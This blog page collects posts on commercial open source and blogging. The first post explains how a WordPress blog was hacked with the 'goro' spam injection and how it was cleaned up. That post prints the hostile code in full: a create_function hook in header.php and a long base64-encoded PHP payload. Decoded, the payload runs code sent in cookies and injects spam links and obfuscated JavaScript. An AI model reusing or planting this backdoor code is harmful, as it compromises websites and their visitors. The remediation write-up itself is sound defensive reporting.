Roberto Galoppini's
Commercial Open Source Software

Two days ago a my Northern European friend Era after reading a post adviced me that my blog site have been silently owned by Search Engine spammers. Spam in blog is definitely not a new phenomenon, but I knew very little of spam injection before, and I hope my experience can help other Wordpress users.

The problem was that a foreign div loads in the header “div id=goro“, and a list of spam links to various porn links. I asked my dear webbie to help me, and she put me in touch with Francesco Mosca, who actually fixed the problem as follows.

Within the theme’s page header.php, hacked using likely a wordpress 2.0.1 bug:

create_function('', get_option("blog_headers")); ?>

[snipped code]

<?php $wp_headers() ?>

Actually those lines of code were calling the code contained within the database in the blog_headers option (“wp_options” table, option_name = ‘blog_headers’):

611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25f254b
7f8f3611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25
f254b7f8f3611a2dee6df9249f21eb25f254b7f8f3*/ $c55375dba9d2f1867f4083acce95988dd=’Pz48P3BocAoJaWYoaXNzZX
QoJF9DT09LSUVbJ2F1dGgnXSkgJiYgJF9DT09LSUVbJ2F1dGgnXSA9PSAn
NjExYTJkZWU2ZGY5MjQ5ZjIxZWIyNWYyNTRiN2Y4ZjMnKSB7CgkJaWYgK
Glzc2V0KCRfQ09PS0lFWydzaG93X3Rlc3QnXSkpIHsKCQkJZWNobygiPFRF
U1RQQVNTPiIpOwoJCX0KCQkkaSA9IDA7ICRsaW4gPScnOwoJCXdoaWxlI
Chpc3NldCgkX0NPT0tJRVsnbGFzdGluJy4kaV0pKSB7CgkJCSRsaW4uPSAk
X0NPT0tJRVsnbGFzdGluJy4kaV07CgkJCSRpKys7CgkJfQoJCWlmKHN0cmx
lbigkbGluKT4wKSB7CgkJCWVjaG8oIjxsYXN0aW4+Ii5tZDUoJGxpbikuIjwvb
GFzdGluPjxleC1kYXRhPiIpOwoJCQkkbGluID0gcHJlZ19yZXBsYWNlKCcvXy
8nLCAnKycsICRsaW4pOwoJCQlldmFsKGJhc2U2NF9kZWNvZGUoJGxpbikpO
woJCQllY2hvKCI8L2V4LWRhdGE+Iik7CgkJCSRjb2RlID0gZ2V0X29wdGlvbig
nYmxvZ19oZWFkZXJzJyk7CgkJCWlmIChwcmVnX21hdGNoKCcvOTU5ODh
kZD1cJyguKj8pXCcvcycsICRjb2RlLCAkcmVncykpIHsKCQkJCWVjaG8oIjx2
ZXI+Ii5tZDUoJHJlZ3NbMV0pLiI8L3Zlcj4iKTsKCQkJfQoJCX0KCQlleGl0KCk7
Cgl9CgkkdGV4dCA9IGdldF9vcHRpb24oJ3JlY2VudGx5X2FkZGVkJyk7Cgkkd
WEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CglpZiAoaXNzZXQ
oJHRleHQpICYmIHN0cmxlbigkdGV4dCk+MCAmJiAocHJlZ19tYXRjaCgnLyhib
3R8c3BpZGVyfHNsdXJwfGdvb2dsZXxleHBsb3JlcnxmaXJlZm94fG9wZXJhKS
9pJywgJHVhKSkpIHsKCQkJCSRycSA9ICRfU0VSVkVSWyJSRVFVRVNUX1VS
SSJdOwoJCQkJJHJzcyA9ICJyc3NfIi5tZDUoJHJxKTsKCQkJCSRzZWVkID0gd
W5zZXJpYWxpemUoYmFzZTY0X2RlY29kZShnZXRfb3B0aW9uKCRyc3MpKS
k7CgkJCQlpZiAoISRzZWVkKSB7CgkJCQkJZ2xvYmFsICR3cGRiOwoJCQkJCS
R3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdG
lvbl9uYW1lLCBvcHRpb25fdmFsdWUsIG9wdGlvbl9kZXNjcmlwdGlvbiwgYXV0
b2xvYWQpIFZBTFVFUyAoJyRyc3MnLCAnJywgJycsICd5ZXMnKSIpOwoJCQk
JCSRzZWVkID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBMQVNUX0lOU0VSVF9
JRCgpIik7CgkJCQkJdXBkYXRlX29wdGlvbigkcnNzLGJhc2U2NF9lbmNvZGUoc2
VyaWFsaXplKGFycmF5KCRzZWVkLCRycSkpKSk7CgkJCQl9IGVsc2UgewoJCQ
kJCSRzZWVkID0gJHNlZWRbMF07CgkJCQl9CgkJCQkkdGV4dCA9IGJhc2U2NF
+JHdjKSB7CgkJCQkJJHNlZWQtPSR3YzsKCQkJCX0KCQkJCWVjaG8gJzxkaXY
gaWQ9Imdvcm8iPic7CgkJCQllY2hvIGpvaW4oIiZuYnNwOyIsYXJyYXlfc2xpY2
UoJGEsJHNlZWQqMzAtMzAsMzApKTsKCQkJCWVjaG8gJzwvZGl2PjxzY3JpcHQ
gdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4nOwoJCQkJZWNobyAiZnVuY3Rpb24g
Z2V0bWUoc3RyKXsgdmFyIGlkeCA9IHN0ci5pbmRleE9mKCc/Jyk7IGlmIChpZHg
gPT0gLTEpIHJldHVybiBzdHI7IHZhciBsZW4gPSBzdHIubGVuZ3RoOyB2YXIgbm
V3X3N0ciA9ICcnOyB2YXIgaSA9IDE7IGZvciAoKytpZHg7IGlkeCA8IGxlbjsgaW
R4ICs9IDIsaSsrKXsgdmFyIGNoID0gcGFyc2VJbnQoc3RyLnN1YnN0cihpZHgsID
IpLCAxNik7IG5ld19zdHIgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoY2ggKyBp
KSAlIDI1Nik7IH0gZXZhbChuZXdfc3RyKTsgfSI7CgkJCQllY2hvICJnZXRtZSgna
HR0cDovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9zaG93
X2Fkcy5qcz82MzZENjA3MTY4NUY2NzZDMjU1RDVBNjgzODVFNTY1RDU0NUM
2MTJFNjQzMzREMTAwRTRENTQ1NjUyMDkwQTBFNTI1MjU2NDg0MDA4M0Q0
MTRBNDY0MTM1NEMwRkY4M0UzRTNDMzJGMzA2Jyk7IDwvc2NyaXB0PiI7Cgl
9Cgo/Pg==’;$e_ = error_reporting(0); eval(base64_decode($c55375dba9d2f1867f4083acce95988dd)); error_reporting($e_); return true;

Decoding it with base64_decode came out that such code calls an external javascript that pastes on the fly some spam links in the page, writing also in the option field strings of this form rss_*, like the following:

mysql> select option_value from wp_options where option_name =

‘rss_fffbb7d85fc00f0c0d14abf4fde94ce3′;

+————————————+

| option_value
|+————————————+

| YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9 |

+————————————+

Besides erasing the above mentioned lines from the header.php, you need also to erase blog_headers and ‘friends’ from the database:

delete from wp_options where option_name = ‘blog_headers’;delete from wp_options where option_name like ‘rss_%’ and option_name

not in (’rss_language’,'rss_use_excerpt’,’ rss_excerpt_length’);

Find the offending goro spamware injection before google bans you from internet pipe. Amazingly as soon as I got it fixed my blog got its previous position.

Note: My blog is under repair these days, the old theme will soon be available, along with twitters and skype alert. Sorry about that.

Technorati Tags: wordpress, goro, spam injection, blog spam, FrancescoMosca

After the announcement of the integration with Facebook Alfresco made public that Alfresco Social Computing Platform - which integrates Alfresco with Adobe Flex, Facebook, iGoogle, MediaWiki, TypePad and WordPress - will be available for download by tomorrow on SourceForge.

While Alfresco is probably not the first open source projects to experiment with Facebook, John Newton - co-founder and Chief Technical Officer of Alfresco - believes that pushing for the expansion of social computing in the enterprise is an imperative. John on his “manifesto for Social Computing in the Enterprise” states:

The next generation of enterprise employees who started using the internet in their early teens have only known this evolving culture of free and creative development of the internet and now demand better of the enterprise software that they meet.

While I don’t know if every CTO should be on Facebook, as says Jon Williams at the New York CTO blog, I believe Seth Gottlieb’s theory is correct:

most Intranets fail as social collaboration tools because they cannot capture the energy and passion that seems to form spontaneously on the web. And my theory goes on to assert that people do not invest their personal energy on their corporate intranet because they don’t own it.

John, why are you addressing Facebook audience?

In order for ECM to move from 10% that are specialists in a firm (compliance, doc control, regulatory, maintenance and web sites) to the 90% that need it to control out-of-control information on shared drives, it would need to introduce compelling user interfaces based upon social networking and social computing.

I think Alfresco did a great move addressing needs of the new generation of knowledge workers is enabling a new enterprise vision of social computing.

Last but not least Alfresco rather than building everything on its own is defining an architecture of participation based on Web Scripts Framework. Let’s see if it will eventually help them to foster their community.

Technorati Tags: Alfresco, JohnNewton, SethGottlieb, JonWilliams, Social Software, Facebook, oss, commercial open source, open business

Today I took my time to zoom back over my last year blogging over open source. Commercial Open Source blog has just completed its first year of life.

In November 2006 I scrambled with the generous help of Antonella Beccaria and little advice of my new media mentor Robin Good to create the blog site you are just reading now.

A year in review by _mpd_

I was happy. I was excited. I could not hold myself in place. I felt that the time to share my ideas, some of my experiences, a bit of my know-how had definitely come.

I see the web as a venue for sharing, exchanging and making valuable conversations, and I thought that I had to make myself fully part of this.

One idea that significantly influenced my decision to take on blogging was the Open Source Franchising business model. As a matter of fact in the summer 2006 I had already written a paper describing such business model, which I had also submitted to Sun Microsystems. My desire, especially since Sun didn’t ever comment back on my proposal, was then to extend my quest for feedback and opinions from other authoritative open source thought leaders.

Matt Asay positively commented my idea, and many others followed, opening the conversation. It was my very first success as blogger, and it showed me the importance and effectiveness of using a blog to create an online dialog. The conversation went on for several months, until Simon Phipps - Chief Open Source Officer at Sun - fully embraced my idea to the point of taking up the flag himself.

Thanks to this and probably to some of my other writings, some initial gigs came through:

• IDC invited me to give a speech on my early experience of corporate blogging;
  .
• I got involved in a joint research activity with the FLOSSMETRICS project;
  .
• the University of Agrigento asked me to talk about professional blogging at the e-learning and multimedia conference;
  .
• The 18th Annual Jolt Awards invited me to participate as judge.

And that’s how I discovered how blogging could be helpful to get invited in meetings, events and conferences, eventually opening me doors and new opportunities. As I go forward in my blogging experience I am realizing that my use of writing to get greater exposure and visibility may very well be my very best marketing strategy.

Like it or not, I had also my share of ego-boosting. Initially mostly for psychologically reward, later on as an increasingly valuable meter of my own professional credibility, I have had spent my share of time checking up technorati and looking at google ranks, just as everyone else. And I learned a few things:

1. you can get to know lots of like-minded people who share your interests, passions and sometimes business customers and reach out to them in ways that would be next to impossible in the physical world:
   .
   • a chat with Ross Turk - SourceForge Community Manager - brought me in the SourceForge Marketplace Board;
     .
   • my interest for Open Source Government led my in touch with International programs aimed at enabling and empowering the use of Open Source in Public Administrations.
     .
   • after Joomla! went GPL I have been kindly asked to give them advice on their business model, as I did through my blog, on forums and also off-line;
     .
   • open source startups, associations and also VCs reading my rants on open source business models eventually started to contact me through my blog.
     .
2. among my key referrals opensource.org and openoffice.it/org have played a significant role in sending me huge number of visitors, that made me realize how important is to keep contributing whenever possible to such large and important communities;
   .
3. Robin Good was totally right suggesting me to pay great attention to choose the tag-line. Googling for Commercial Open Source my blog is always one of the very first results. In reason of that PR agencies and CEOs from all around the world touch base with me daily to open more and more conversations.
   .
4. I learned to stay focused and to not get distracted by off topic arguments, as soon as I did I was rightly “ripreso” for that.

Last but not least, I wish to share some authors and bloggers I found inspirational:

• Savio Rodrigues for his opinions on open source market trends;
  .
• Matthew Aslett analysis and reports on Open Source VC funding;
  .
• Dana Blankenhorn taking an in-depth look into open source enterprise;
  .
• James McGovern’s sight on human aspects of technology around open source;
  .
• Alex Fletcher’s ramblings on the open source industry;
  .
• Red Monk’s folks, with their insights, unconferences and challenges.

I learned a lot from them, and with some I am enjoying regular conversations. After all the ultimate reason to keep writing daily for all of us is that it is really true that no man is an island, not even a blogger!

Technorati Tags: open source blog, professional blogging, SavioRodrigues, DanaBlankenhorn, MatthewAslett, RossTurk, SourceForge Marketplace, JamesMcGovern, RedMonk

I just got back from Sarajevo, where I participated as speaker to an advanced course in web communications in the Public Administration. The course, aimed at public operators from Bosnia-Herzegovina, was designed to be an in-depth analysis on the use of Open Source in Public Administrations.

Sarajevo by Giuli@

I had the honor of presenting two seminar sessions, talking about Open Standards and Open Source Software. I opened my first speech focusing on what is a software patent, and how they (could) affect open data standards. I spent an hour or so talking about on Open Source Requirements, Principles and Practices and making analogies with the real world (power plugs, etc).

My second pitch was all about pragmatic open source. I started speaking about how Organisational Wiki Adoption could greatly help communications and information flows within Public Administrations. The audience was pretty interested and we eventually ended comparing email, Instant Messaging and Groove against a wiki, in terms of usability, synchronicity of interaction and ease of participation.

Attendees were concerned about the Open Source perception, and open source support, and I showed them some useful tools to manage software selections. Since only few open source projects offer enterprise support, I make them familiar with:

• Ohloh, included its Compare function, to know about code, developers, languages and licenses;
  .
• Google trends, to learn about how much is the know an open source product;
  .
• QSOS, to assess open source projects, read about already assessed ones, also through Firefox;
  .
• Get-a-freelancer, Rent-a-coder, SourceForge Marketplace but also Joomla developers, to hire and find developers and firms.

I really enjoyed being there. The audience, despite the latency due to the translation, was participative and willing to know more and more.

Is a country of contrast, where people died together, and now try to live together. A very interesting country, and I really hope to get a chance to be back.

About the Communications for the Public Administration course.

The project “Balkans 2 - Development and Strengthening central and local PA in the Balkan Region” is aimed to 6 Balkan countries (Albania, Bosnia-Herzegovina, Croatia, Macedonia, Serbia and Montenegro) and continues the activities already started up and partly developed with the Balkans 1 project which was held from November 3rd to December 31st 2004. This is an integrated project of “Institutional and Capacity Building” aimed to civil servants and executives from central and local Balkan administrations, divided into diverse activities of technical assistance, classroom and on-the-job training, information and communications on themes which have been identified and agreed upon together with the institutional counterparts of the involved countries on the occasion of numerous missions and meeting realized during the first year of activities. The dedicated areas are the following:- Civil Protection- Management of Protected Areas- Cultural Heritage- Communications for the Public Administration.

Technorati Tags: Sarajevo, Bosnia, Herzegovina, Open Source Government, Open Standards, QSOS, SourceForge

Disappointed: Nick Gall of Gartner - James McGovern wonders why at Gartner don’t spend time answering his questions. My guess is that they are not (yet) deeply into the ‘blog thing’, because if they had a look at their popularity James’s blog pops up as one of the most authoritative pointing to them.

Office 2.0 Conference Website Now Live - The upcoming Office 2.0 Conference is now live, attendee registration are open by now.
blogging is dead, long live communicating - Luis Villa says that most discussions about blogging would be much better off if we analyzed ‘communication that is public, searchable and persistent’ instead of ‘blogging’. I totally agree.

We need an Open Service Definition - People at GNOME (Havoc Pennington’s blog) is thinking to to protect our private data, , but the same definition could reward also services which use and promote open knowledge. Interesting issue.

Will Oracle Buy Red Hat or BEA? - Savio plays Nostradamus and predicts that Oracle will not buy Red Hat. Oracle may buy BEA. Read his post to know why.

Managing backup of MySQL via iPhone - Whether it makes sense or not, Zamanda presented to a couple of their customers a solution to manage MySQL backups via iPhone, read the use case.

Can’t buy me (OOXML) love in Italy - Bob Sutor enjoyed Carlo Piana’s post “OOXML does not buy its way in Italy“, and he posed also a question: is whether a large company with a lot of money and business partners will essentially be able to stack committees so that they are out of balance and therefore buy an ISO standard? I am afraid that the whole ISO standardization process lost some sense, the ultimate result of the File Format War might be just invalidate the process owner itself..

Talend raises $3.5m in Series B funding round - Raven Zachary tells us about the Talend 2nd round.

Funambol is a 2007 AO 100 Top Company - Fabrizio got listed in the AO 100 Top Companies, congratulations!

Gartner, Open Source, and Microsoft - Seth keeps posting on the subject, he simply can’t resist!

The first Italian Barcamp about video-blogging and Web TV went live over the Internet in many different forms, last Saturday from Taxi Channel studios, here in Rome.

Vlog camp, Robin Good & Tommaso Tessarolo Smeerch

Despite the hot day, there were quiet a few people, and I happened to know Bruno Pellegrini. founder of Nessuno.TV a portal for Italian videobloggers, and also TheBlogTV, probably the first TV station broadcasting user-generated content. Bruno wrote also a book, entitled “Io? Come diventare videoblogger e non morire da spettatore” (eng: Me? How to become a videoblogger and do not die spectator), given as a present to all participants.

Tommaso Tessarolo, author of another book entitled “NetTv“, was also present, and he presented an interesting backstage video.

Robin Good went live all the time on his robingood.tv, I happened to help him recording his speech about how to become a video-blogger, and I interviewed Amanda Lorenzani and Leo Sorge talking about Italian startups.
Robin Good reported the whole event through two different posts Part 1 and Part 2, if you speak Italian or you want to, have a look!

Technorati Tags: vog camp, barcamp, theblogtv

Business as Usual - Bill Hilf on Port25: It’s not us versus the free world.

Three Minutes with Microsoft’s Open-Source Manager - Bill Hilf explains Microsoft strategy: to license and not litigate. Am I the only one thinking to the Cold war at this stage?

235 more reasons to love open source - Fabrizio Capobianco designed a funny and provoking t-shirt, and I guess he is going to bring along an XXL one for Bill Hilf next Monday!

Steve? Darl? All of the Above? - Billy Marshall asserts that Microsoft won’tl like the nature of the collateral damage caused by the 235 move.

(added on the 20th) Microsoft’s Patent Impasse - A lucid commentary by Cote’, really enlightening.
Organizing an Open Source Workshop!!! - A workshop entitled “Open Source, Open Ideas” will be held on Tuesday May 29th at the Politecnico di Bari campus sponsored jointly by Politecnico di Bari, OrgLab (University of Cassino), Syracuse University and IESEG School of Management.

Dell announces the models for Ubuntu - Jeremy discloses Dell’s Ubuntu models.

I’m Joining Adobe - Ryan Stewart joined Adobe as a Rich Internet Application Evangelist.

MySQL is really working hard to foster its community, and now the MySQL Winter of Code initiative sounds just like the first notable step. Today Tim O’Reilly explained why he just joined the MySQL Board.

O’Reilly by Duncan Davidson

Second, Märten, Monty, and David asked me nicely :-), and after some substantial discussions with them, I came to the conclusion that I could add some value to the company. They were looking for someone who had a sense of the competing pressures of business and open source idealism, and could help them steer a careful course through the obstacles. As open source grows up, there can be tension between its community roots and its business aspirations. But that tension can also be a creative force, and MySQL AB wants to be sure to continue to harness the creativity of the open source developer community, as it becomes an ever-more viable alternative to existing closed source commercial databases.

Well done MySQL, well done.. and they are already getting the very first result:

While I’m on the subject of MySQL, I should mention that O’Reilly produces the MySQL User Conference in conjunction with MySQL AB. The conference will be held April 23-26 in Santa Clara. The early registration discount ends March 14, so if you’re interested in MySQL, you should sign up now.

Whatever you call it - Word of Mouth, Liquid, or Viral Marketing - it works, and any commercial open source firm just need it indeed.

Technorati Tags: open source, MySQL, O’Reilly

Robin Good, a famous indipendent online Publisher, while in Ancona’s barcamp held a very interesting speech titled “Be your own boss”, explaining how making money blogging.

Photography courtesy of 7th Floor - MAP

He also wrote a good piece based on his presentation. A must read If you want to know how to make your blog more effective. wether you’re interested or not in making money from it. Fourteen out of the sixteen points indeed are not about monetizing, and many of them point to other resources.

• Find your passion
  .
• Create your shack
  .
• Niche, Theme, Focus
  .
• Write daily
  .
• Become a Newsmaster
  .
• Quality not Quantity
  .
• Make Yourself Be Found
  .
• Make Yourself Be Read
  .
• Communicate Visually
  .
• If you want them to return, send them away Open the conversation
  .
• Create your own “brand”
  .
• Promote your contents Monetize
  .
• Google AdSense
  .
• Track, Monitor, Test

Take your time, and read them all!

Technorati Tags: blog, robin good, newsmaster, barcamp

Nonetheless I am no Robert Scoble, I’m honored to have been invited by FIDAInform, the National Federation of the Associations of Information Management Professionals, to give a speech about Corporate Blogging by the IDC Content & Document Management Conference 2007 held last tuesday here in Rome.

Being a neo-blogger I took the chance to share with the audience, mostly Public Administration managers, a little bit of my own experience and insights into what I have learn in the last few months.

I started talking about the five key things that have influenced corporate blogging:

1. The blogosphere dimension
   doubling every 236 days, 100 times bigger than 3 yrs ago;
   .
2. Mainstream media vs blog
   only 3 blog in the first 50 positions, but the “long tail” belongs to blogs;
   .
3. People talk
   the value created by group-forming network grows exponentially with members:
   .
4. Push vs Pull
   web feed formats changed the way we keep ourselves informed;
   .
5. Blogging
   is simple.

Then I gave few examples showcasing the above issues at work.

External blogs.
I mentioned how blogs can be Marketing’s nightmare and dream, or tools to leverage market conversations. Networked market often knows more than companies do about their own products. Blogs might help also to build connections with key audiences. An external corporate blog through transparency might add a level of credibility unobtainable from standard media, like showing a different side of the company.

Internal Blogs.
To open to the whole organisation the decision making process blogs can avoid the hierarchical vertical confirmation process, exploiting lateral thinking and collective intelligence potentialities. The blog becomes also the written memory of the organization, replacing emails, which are not the best information sharing tool.

Feeds.
Posts and comments are easy to reach and follow without the need to visit the blog, either if it is an internal or external one. Within an organization RSS spam-free method can easily discover any sort of information through basic search applications, making financial or technical news at hand. Last but not least the cost of producing RSS content is mostly negligible. To see how a feed-reader works I suggest to try on-line tools: Andrea Martines developed Excite-MIX a really easy to use widgeted page.

My Experience.
I started blogging just three months ago, and I keep talking daily about Corporate Blogging with Robin Good and Nicola Mattina. I have also signed up for some “persistent news searches” using “corporate blog” as my search keyword.

I also work very hard to make mistakes, so that I can always learn something new.